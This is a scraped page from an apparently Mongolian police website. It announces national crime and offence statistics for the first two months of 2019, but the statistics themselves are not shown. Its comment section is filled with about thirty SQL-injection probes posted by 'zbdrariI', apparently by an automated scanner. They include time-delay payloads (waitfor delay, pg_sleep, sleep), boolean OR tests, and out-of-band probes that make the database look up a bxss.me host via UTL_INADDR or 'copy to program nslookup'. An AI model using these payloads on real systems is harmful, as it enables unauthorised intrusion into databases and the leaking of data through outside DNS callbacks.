• Нүүр хуудас
  • Системүүд
  • Харьяа нэгжүүд
  • Холбоо барих
  • Асуулт хариулт
  • Иргэний хяналт

УЛСЫН ХЭМЖЭЭНД 2019 ОНЫ ЭХНИЙ 2 САРД БҮРТГЭГДСЭН ГЭМТ ХЭРЭГ, ЗӨРЧЛИЙН МЭДЭЭ

2019-03-05
УЛСЫН ХЭМЖЭЭНД 2019 ОНЫ ЭХНИЙ 2 САРД БҮРТГЭГДСЭН ГЭМТ ХЭРЭГ, ЗӨРЧЛИЙН МЭДЭЭ
zbdrariI 1 waitfor delay '0:0:6' --
2019-09-17 Хариулах
zbdrariI rsGiuGNc'; waitfor delay '0:0:9' --
2019-09-17 Хариулах
zbdrariI -1;select pg_sleep(3); --
2019-09-17 Хариулах
zbdrariI -1);select pg_sleep(3); --
2019-09-17 Хариулах
zbdrariI -1));select pg_sleep(6); --
2019-09-17 Хариулах
zbdrariI ry4o1AnU';select pg_sleep(9); --
2019-09-17 Хариулах
zbdrariI ax2R0FyH');select pg_sleep(9); --
2019-09-17 Хариулах
zbdrariI lulFceVe'));select pg_sleep(3); --
2019-09-17 Хариулах
zbdrariI 254'
2019-09-17 Хариулах
zbdrariI if(now()=sysdate(),sleep(6),0)
2019-09-17 Хариулах
zbdrariI 0'XOR(if(now()=sysdate(),sleep(9),0))XOR'Z
2019-09-17 Хариулах
zbdrariI 0"XOR(if(now()=sysdate(),sleep(3),0))XOR"Z
2019-09-17 Хариулах
zbdrariI (select(0)from(select(sleep(6)))v)/*'+(select(0)from(select(sleep(6)))v)+'"+(select(0)from(select(sleep(6)))v)+"*/
2019-09-17 Хариулах
zbdrariI -1; waitfor delay '0:0:9' --
2019-09-17 Хариулах
zbdrariI -1); waitfor delay '0:0:3' --
2019-09-17 Хариулах
zbdrariI 555||UTL_INADDR.get_host_address('dns.'||'sqli.070005.1-85253.1.31a8a.1.bxss'||'.me')
2019-09-17 Хариулах
zbdrariI '||UTL_INADDR.get_host_address('dns.'||'sqli.070005.1-85256.1.31a8a.1.bxss'||'.me')||'
2019-09-17 Хариулах
zbdrariI 555;copy (select '') to program 'nslookup dns.sqli.\070005.1-85259.1.31a8a.\1.bxss.me'
2019-09-17 Хариулах
zbdrariI 555';copy (select '') to program 'nslookup dns.sqli.\070005.1-85262.1.31a8a.\1.bxss.me
2019-09-17 Хариулах
zbdrariI -1' OR 2+397-397-1=0+0+0+1 --
2019-09-17 Хариулах
zbdrariI -1' OR 3+397-397-1=0+0+0+1 --
2019-09-17 Хариулах
zbdrariI -1' OR 2+917-917-1=0+0+0+1 or 'aVAD1FPD'='
2019-09-17 Хариулах
zbdrariI -1' OR 3+917-917-1=0+0+0+1 or 'aVAD1FPD'='
2019-09-17 Хариулах
zbdrariI -1" OR 2+674-674-1=0+0+0+1 --
2019-09-17 Хариулах
zbdrariI -1" OR 3+674-674-1=0+0+0+1 --
2019-09-17 Хариулах
zbdrariI -1 OR 2+898-898-1=0+0+0+1 --
2019-09-17 Хариулах
zbdrariI -1 OR 3+898-898-1=0+0+0+1 --
2019-09-17 Хариулах
zbdrariI -1 OR 2+668-668-1=0+0+0+1
2019-09-17 Хариулах
zbdrariI -1 OR 3+668-668-1=0+0+0+1
2019-09-17 Хариулах
zbdrariI 555
2019-09-17 Хариулах